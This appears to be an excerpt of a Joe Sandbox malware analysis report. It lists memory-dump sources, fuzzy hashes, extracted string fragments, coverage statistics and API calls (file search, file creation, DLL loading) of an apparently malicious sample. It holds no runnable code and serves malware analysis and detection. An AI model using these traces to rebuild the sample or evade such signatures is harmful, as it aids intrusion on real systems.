                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98b641180fee4e253e73fc08c4a36c1cff09e94be09aea2e956be691e925d5f5
                        • Instruction ID: 0f23f5cd041e024ad5d46547ecd6dadf920afec477644a23a563e580fb3efdb1
                        • Opcode Fuzzy Hash: 98b641180fee4e253e73fc08c4a36c1cff09e94be09aea2e956be691e925d5f5
                        • Instruction Fuzzy Hash: 6E115E71A007456BD720EBA8DC41FABB7ADEF85710F14451DFB19A7280EBB06911CBA1
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction ID: 35d5e173add590a843a5abfd9bda71fa20a24310f46b130e2c57c57da4020eb8
                        • Opcode Fuzzy Hash: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction Fuzzy Hash: 360180B2214248BBCB54DE99DC81EEB77ADAF8D754F548208FA19E3240D630E951CBA4
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09a76790dbdf74a4f91f7509aa6eb142f9fe10ffc0b7531da95f0af3d44b6ade
                        • Instruction ID: 54d947fb8470f2291df3d8c136d94754ce9f619b54226dc7c600ec1b38eab722
                        • Opcode Fuzzy Hash: 09a76790dbdf74a4f91f7509aa6eb142f9fe10ffc0b7531da95f0af3d44b6ade
                        • Instruction Fuzzy Hash: B501D7B2C01219AF8B40DFE8D9409EEBBF9AB08600F14466EE919F6240F7705A048FA5
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2adbde70e96d360acebc886663f3d057b268337dc9ddd8d671d824a7afd3731c
                        • Instruction ID: 056973747f2eef7ab3998e87061f2b9ba146290e42f69d605578481be14342d5
                        • Opcode Fuzzy Hash: 2adbde70e96d360acebc886663f3d057b268337dc9ddd8d671d824a7afd3731c
                        • Instruction Fuzzy Hash: 21F0B4735142165BE7104A5CEC40B97B79DEB84375F240222FB1D87251D371A4518BA0
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00a062acd090cad76c8390655a6fb8f775ee24b6b59a53b751345efd5b0becfa
                        • Instruction ID: 50b6a12637df4cf8890c8d2b720e2c3b79d87968c03fb43c20779d7ebd063215
                        • Opcode Fuzzy Hash: 00a062acd090cad76c8390655a6fb8f775ee24b6b59a53b751345efd5b0becfa
                        • Instruction Fuzzy Hash: B1F01CB6200209BFD710DF99DC81EAB77ADEFC9750F004109BA18A7240D6B0B911CBB0
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                        • Instruction ID: 19bdb1fb3fc5867581e56b60d60b95b66623fd70ab765a8ee3e1fa648ef38c99
                        • Opcode Fuzzy Hash: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                        • Instruction Fuzzy Hash: ABF08271D05208EBDF14CFA8D841BDEBBB5EB04360F104369E9259B280D63497548B81
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction ID: b4c2154b54109dc2385691832a92e6c779827c0e00f1dfefd2f42bbe29c93c15
                        • Opcode Fuzzy Hash: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction Fuzzy Hash: 4FE06D756042047BC614EE58DC45EEB33ADEFC8710F004409FA09A7240C670B9118AB4
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a9d020b962982346de8deb6e798606e13f994b6e67d19b73e68850110c0708e
                        • Instruction ID: c23181f9f89fafe519e0c9e64b6308428c6a2f91e663c78550deec9550c191f4
                        • Opcode Fuzzy Hash: 1a9d020b962982346de8deb6e798606e13f994b6e67d19b73e68850110c0708e
                        • Instruction Fuzzy Hash: 2FE08677A5121937D22075999C05FA7F76DCFC1FA0F090069FF089B350E661B91186E4
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a36d11d7fd2540fc9f8ee9a862e055587441e3092b8664b8cfb1d3091816399b
                        • Instruction ID: db04ccc6b3a6d881776fa958bb39e1f439d5f8e964135f6da3ddb2ec3c19ce7f
                        • Opcode Fuzzy Hash: a36d11d7fd2540fc9f8ee9a862e055587441e3092b8664b8cfb1d3091816399b
                        • Instruction Fuzzy Hash: 35E068333502114BEB410A2CF4C13813F8AEB42B98F4C00E6E34A8FB09D3B2820BCB49
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction ID: 414a8468d3496c98980228175ae34cdf12bc4d1d24caed385aea7774ca1de8ba
                        • Opcode Fuzzy Hash: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction Fuzzy Hash: 2EE046362006047BD220AB69DC02FAB77ADEFC5761F004159FA09A7241DAB1BA028BB0
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ef42a7e0b3bbc4e1b7abfccfc2c2a47a97349c232721320cb7feacae2fc59d2
                        • Instruction ID: ac0c70614efdb6398665b9fbe10da960f6c4f82ca1586decfebe6478df8d10ed
                        • Opcode Fuzzy Hash: 4ef42a7e0b3bbc4e1b7abfccfc2c2a47a97349c232721320cb7feacae2fc59d2
                        • Instruction Fuzzy Hash: 6DA002A95D4549650A2371F01E4086A7D4388872E87BD4574B5629C5C7B7C0966464C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                        • API String ID: 0-3248090998
                        • Opcode ID: 1ab50b9612db4895e64fd0a6cb4f10cfb6190932943f21e96b9daf513ecbafb4
                        • Instruction ID: 9447a0fdf3a87656ca615bf2041a65b5701f582421b10c51f141df59e4599e27
                        • Opcode Fuzzy Hash: 1ab50b9612db4895e64fd0a6cb4f10cfb6190932943f21e96b9daf513ecbafb4
                        • Instruction Fuzzy Hash: 1991ECF08052A98ACB118F55A5607DFBF71BB95204F1581E9C6AA7B203C3BE4E85DF90
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "4$$$*$*:$*G$*z$+$+$-$0$3$4$8U$:-$A$B$C$E$J$Kh$Q$R$RU$SL$Us$V$V$[$bp$k$m$n$p$w$w_$z$,$R$`
                        • API String ID: 0-3217005643
                        • Opcode ID: 10d176fa73f93bcbf9982e1cf877d37eac99d032b458a74a176183b416aac059
                        • Instruction ID: 79cbc950f6d2074c09c770b0cc0b91eeadc39e860151f78986d82c58ec7b2565
                        • Opcode Fuzzy Hash: 10d176fa73f93bcbf9982e1cf877d37eac99d032b458a74a176183b416aac059
                        • Instruction Fuzzy Hash: FDC107B0C06669CBEB608F45D9987DEBAB1BB05308F1081D9C55C3B281D7BA1AC9CF95
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                        • API String ID: 0-1002149817
                        • Opcode ID: 0e42941ab3bf7d6bef5090cc89488ecb2000263d690d383cbed5a23b3094fd18
                        • Instruction ID: 3260a2b6a49c8d151e406b19c8e99c53eaaac08ae52872d041498099ca9cb8e6
                        • Opcode Fuzzy Hash: 0e42941ab3bf7d6bef5090cc89488ecb2000263d690d383cbed5a23b3094fd18
                        • Instruction Fuzzy Hash: 26C14FB1D002289EDF61DFA4CD44BEEBBB9AF05344F00819DD64DAB251E7B54A88CF91
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                        • API String ID: 0-392141074
                        • Opcode ID: fc90facbfe9b2ea27073110e3edb82a1ec6a79a474cd4e1e9472ebb62533efd2
                        • Instruction ID: 598a58061237b2132e4be2b4ccb29720f962db05f82c8598dd346f85260740a6
                        • Opcode Fuzzy Hash: fc90facbfe9b2ea27073110e3edb82a1ec6a79a474cd4e1e9472ebb62533efd2
                        • Instruction Fuzzy Hash: D7711FB1D10218AAEB25EB94CC40FEEF77EAF08740F04459DE709AA150EB7067488FA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                        • API String ID: 0-392141074
                        • Opcode ID: b31f96973f7884e5c03a87134cc79083df9867b17fe5b29f61557f51757810b9
                        • Instruction ID: a0725e0a535ca7a865978b9706862f0065a1c164dfd31f6473a35a42e2ddd1e6
                        • Opcode Fuzzy Hash: b31f96973f7884e5c03a87134cc79083df9867b17fe5b29f61557f51757810b9
                        • Instruction Fuzzy Hash: CC612FB1D10218AADB65EB94CC40FEEF7BABF08340F04419DE709A6191E7B16748CFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: -6pj$33>p$7-02$:pkk$;0(,$_$i$iqld$jlhq$kolq$lhql$lhqli$qoqm
                        • API String ID: 0-3534071798
                        • Opcode ID: 903f3814e9fb6d44f257ac5f976a666606719df9a63b68e6935ad1674687423e
                        • Instruction ID: eac3db8c66eee9d25eca5bc6b1704d0dc13473bc58e3666ecec77b66a646851f
                        • Opcode Fuzzy Hash: 903f3814e9fb6d44f257ac5f976a666606719df9a63b68e6935ad1674687423e
                        • Instruction Fuzzy Hash: 2F21ECB4C042489ACB10CF96D9806EEFF79FF04704FA4810DE515AF248D7764A12CF9A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                        • API String ID: 0-2356907671
                        • Opcode ID: 445c3259711e9ab39b125d503ba45c52aa12e1dc7ecb03d05717592d4c10fc9c
                        • Instruction ID: 323af8e5d8d51f53f13e4c31f70c91dc34409585e8a5ad3fab6f61e3b7e06c72
                        • Opcode Fuzzy Hash: 445c3259711e9ab39b125d503ba45c52aa12e1dc7ecb03d05717592d4c10fc9c
                        • Instruction Fuzzy Hash: F88164B2C003186AEB91FBA4CC80FEFB7BEAF44740F044499A709A6151EB755748CF61
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                        • API String ID: 0-685823316
                        • Opcode ID: fb625ca5aa19305b1b817c8a818807cad6de504b48772fbea0ec9ed9931e8049
                        • Instruction ID: f336e6512304d9ecf3b57628f346011a59d70b1f33f4384ed3de0589ae4c9dbc
                        • Opcode Fuzzy Hash: fb625ca5aa19305b1b817c8a818807cad6de504b48772fbea0ec9ed9931e8049
                        • Instruction Fuzzy Hash: 983198B1D5021CAAEF50DFE4DC44BEEBBBABF04740F10415CE608B6180DBB556088FA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: L$S$\$a$c$e$l
                        • API String ID: 0-3322591375
                        • Opcode ID: 0c9e9afee0dd6807c5a44f7a64b06d4d21c5646e75779fdb459341e165a99d60
                        • Instruction ID: d849fd50e8cf29706e7821d0eb05d1c984ce4d8d238f78bc2e16eceec57b7bb5
                        • Opcode Fuzzy Hash: 0c9e9afee0dd6807c5a44f7a64b06d4d21c5646e75779fdb459341e165a99d60
                        • Instruction Fuzzy Hash: 3C41B6B2C10218AADF50EFA8DC84AEEF7B9EF48310F05429EDA09A7110E77156418FD5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: F$P$T$f$r$x
                        • API String ID: 0-2523166886
                        • Opcode ID: 4d0ef4e0d5c41cc09329282f1f9eb520c7f01ea82c3ea48f2329c605a34066df
                        • Instruction ID: 3e2a7f765259ed4a9d374be9d4790af6bb9a142d8a31bbf32833996753015515
                        • Opcode Fuzzy Hash: 4d0ef4e0d5c41cc09329282f1f9eb520c7f01ea82c3ea48f2329c605a34066df
                        • Instruction Fuzzy Hash: DB51B471900304AFDB35EB64CC44BEBF7E9EF04784F04465DA70A96190E7B5A654CF91
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $i$l$o$u
                        • API String ID: 0-2051669658
                        • Opcode ID: 0ee0559e7d0f4f09f2745c3314fee7a8ea282b9eba20fa721e46b05d6c3e4b4f
                        • Instruction ID: ac70955db9b5aec673c01313877f5733f1be0170a69d57b79e16efbd51e2af76
                        • Opcode Fuzzy Hash: 0ee0559e7d0f4f09f2745c3314fee7a8ea282b9eba20fa721e46b05d6c3e4b4f
                        • Instruction Fuzzy Hash: 776150B6D00308AFDB25DBA4CC80FEFB7F9AB48750F104559E61AA7240D774AA41CBA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $i$l$o$u
                        • API String ID: 0-2051669658
                        • Opcode ID: 543f73d77363d5a33ffebd9801305cd2df064c1d40249a3142d6ed056cc4f016
                        • Instruction ID: a618ba7a1fac675f1cdb04bbccadbd839e5f2b19d5b0041ea5064c2f33f17182
                        • Opcode Fuzzy Hash: 543f73d77363d5a33ffebd9801305cd2df064c1d40249a3142d6ed056cc4f016
                        • Instruction Fuzzy Hash: 5B41FAB5D00308AFDB61DBA4CC84FEFBBF9AB48744F104559E65AA7240D774AA41CB60
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1$9$t$u$y
                        • API String ID: 0-2863724497
                        • Opcode ID: 2924a4fe0cb18c05cf014b9d6f14f90a15c8f0aa8445d174658ab8ae0de97bb0
                        • Instruction ID: 30f0e08ae9706781e19dc4a72f029b6df88eb37b42c200fb06f9054e07a100c9
                        • Opcode Fuzzy Hash: 2924a4fe0cb18c05cf014b9d6f14f90a15c8f0aa8445d174658ab8ae0de97bb0
                        • Instruction Fuzzy Hash: 24312FB1D14119ABEB00DBA4CC45FFEB7B9EF08344F044199EA08A7250E7B5AA448BE5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )$K$s$x${
                        • API String ID: 0-2460612821
                        • Opcode ID: 111d1f20c23030b5e7b94b465d497e89c60a192c8b4b2cc92f808ce588f844ac
                        • Instruction ID: 272a8982c66d92afedfbd32de82dbc68112b28ed6cd9e6625df6da4769b4c959
                        • Opcode Fuzzy Hash: 111d1f20c23030b5e7b94b465d497e89c60a192c8b4b2cc92f808ce588f844ac
                        • Instruction Fuzzy Hash: DB11C910D087CBDDCB22CABD58486AEBF715B23164F0883C9D5F56A2E2C2754706C7A6
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $e$k$o
                        • API String ID: 0-3624523832
                        • Opcode ID: 94587154aa337bd7dac90d3e38d7236459ccde362efd1b409f90d6e099ffbed8
                        • Instruction ID: 1c1f94d16fccf6f964d4b00477c375695e37d32e5a38d26ffb23c5b39d28366a
                        • Opcode Fuzzy Hash: 94587154aa337bd7dac90d3e38d7236459ccde362efd1b409f90d6e099ffbed8
                        • Instruction Fuzzy Hash: 03B1FDB5A00704AFDB65DBA4CD84FEFB7F9AF88740F108558F61AA7240D774AA41CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $e$h$o
                        • API String ID: 0-3662636641
                        • Opcode ID: e6563314f0200f35eded96bf32c59a8dff8ac42364b50ba5b69c5141134c50a8
                        • Instruction ID: 6096eb1bb8f0bdc134fa8c802627428c6ff281d1d354380cf4a6d783d9ee19c8
                        • Opcode Fuzzy Hash: e6563314f0200f35eded96bf32c59a8dff8ac42364b50ba5b69c5141134c50a8
                        • Instruction Fuzzy Hash: AA7144B29002187EDF65EB94CC44FEFB3BEAF45740F044199B64996150EE746B848FA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                        • API String ID: 0-2877786613
                        • Opcode ID: a900fd3b665d41d9a6ba2edd6e38f09c7c26873688a5a88997b47cef50779f3c
                        • Instruction ID: 975988a0f1c82d10ff774135c71c5bad6e646fa35bb33f907ab8ebc66b5ec851
                        • Opcode Fuzzy Hash: a900fd3b665d41d9a6ba2edd6e38f09c7c26873688a5a88997b47cef50779f3c
                        • Instruction Fuzzy Hash: 5C31F7719111187AEB11EB948C52FEFF63ADF59740F04404DBB046A2A0E6B46B05CBF6
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $e$h$o
                        • API String ID: 0-3662636641
                        • Opcode ID: 7cffe629e01c84e5b9586747cde72e1e9367a0f2a10a07673444e30c2faaad5f
                        • Instruction ID: 2dd0b1ba3cd1c72af4ef00492423830504a8b42cc7fe95e8f3b57ea139bd7464
                        • Opcode Fuzzy Hash: 7cffe629e01c84e5b9586747cde72e1e9367a0f2a10a07673444e30c2faaad5f
                        • Instruction Fuzzy Hash: E13153B1E002187EDF91EBA4CC44FEFB2BAAF45740F40419DA649A6150EB746B848F96

                        Execution Graph

                        Execution Coverage:2.6%
                        Dynamic/Decrypted Code Coverage:3.9%
                        Signature Coverage:1.4%
                        Total number of Nodes:485
                        Total number of Limit Nodes:77
                        execution_graph: interactive call-graph data (node addresses, caller/callee edges and API-call annotations such as NtClose, LdrLoadDll, RtlAllocateHeap, NtAllocateVirtualMemory and CreateProcessInternalW) rendered by the report viewer; not reproduced as text here.

                        Control-flow Graph (rendered graph omitted)
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "$%$+$,%$/$0>$2$2Z$;#$< $< $<R$=*$Ae$B:$G3$H$IU$O`$RU$X$Y$_$b%$o$q$u$~l$+$0$9$u
                        • API String ID: 0-4099191530
                        • Opcode ID: f0d97bfc266cb89a751195f7d6ba12e1b092f89b0ccfdd4a23288be59f5d3020
                        • Instruction ID: f1df3ba154505804c03b36b0b87c082b1e6ce042acafe597358df1aead254072
                        • Opcode Fuzzy Hash: f0d97bfc266cb89a751195f7d6ba12e1b092f89b0ccfdd4a23288be59f5d3020
                        • Instruction Fuzzy Hash: C842A0B0D06229CBEB24CF45C9947EDBBB2BB45308F1081DAD4496B280D7B96EC9DF45

                        Control-flow Graph (rendered graph omitted)
                        APIs
                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0042C004
                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0042C03F
                        • FindClose.KERNELBASE(?), ref: 0042C04A
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: e994ebea3dcc68c53da288b019f70c33a8c52c99dce6311839e235961a6aff96
                        • Instruction ID: 247b63ba7913556bada7e59bd3aa24f670d072f8bf6102c5322e2e7c08c679d8
                        • Opcode Fuzzy Hash: e994ebea3dcc68c53da288b019f70c33a8c52c99dce6311839e235961a6aff96
                        • Instruction Fuzzy Hash: 8231A571A00318BBEB20DFA5DC85FFF777C9B44708F54445DB908A7181DA78AE848BA4
                        APIs
                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00437ED0
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: c9ff7e9c102486d3567e1a3ae7d2916bd5240a67c669c1ec41142ee4c605987f
                        • Instruction ID: adb07245180dc1b098bcf6243279636df4e4215ef6cd7ced0692e758907be39a
                        • Opcode Fuzzy Hash: c9ff7e9c102486d3567e1a3ae7d2916bd5240a67c669c1ec41142ee4c605987f
                        • Instruction Fuzzy Hash: B831F2B5A00209AFCB14DF99D881EDEB7F9EF8C304F10821AF919A3340D734A851CBA4
                        APIs
